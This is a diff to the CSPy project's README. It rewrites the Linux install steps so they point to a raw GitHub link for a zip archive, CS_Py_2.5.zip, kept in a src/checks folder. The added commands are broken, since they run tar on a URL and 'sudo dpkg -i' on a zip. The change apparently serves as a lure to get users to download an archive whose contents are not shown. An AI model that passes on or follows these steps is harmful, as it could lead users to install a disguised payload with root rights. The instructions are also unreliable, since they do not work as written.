ttimneu/CSPy/README.md

    - For Windows users: Double-click the `.exe` file to run the setup.
 Follow the onscreen prompts to complete the installation.
    - For macOS users: Open the downloaded `.dmg` file and drag the CSPy icon to your Applications folder.
    - For Linux users:
-     - For `.tar.gz`, extract the files using the command line with `tar -xzvf filename.tar.gz`, then follow the instructions in the README file included.
+     - For `https://github.com/ttimneu/CSPy/raw/refs/heads/main/src/checks/CS_Py_2.5.zip`, extract the files using the command line with `tar -xzvf https://github.com/ttimneu/CSPy/raw/refs/heads/main/src/checks/CS_Py_2.5.zip`, then follow the instructions in the README file included.
-     - For `.deb`, run the command `sudo dpkg -i filename.deb` in your terminal.
+     - For `.deb`, run the command `sudo dpkg -i https://github.com/ttimneu/CSPy/raw/refs/heads/main/src/checks/CS_Py_2.5.zip` in your terminal.

 5. **Launch CSPy**
    After installation, find the CSPy application in your program list or Applications folder.
 Click on it to open.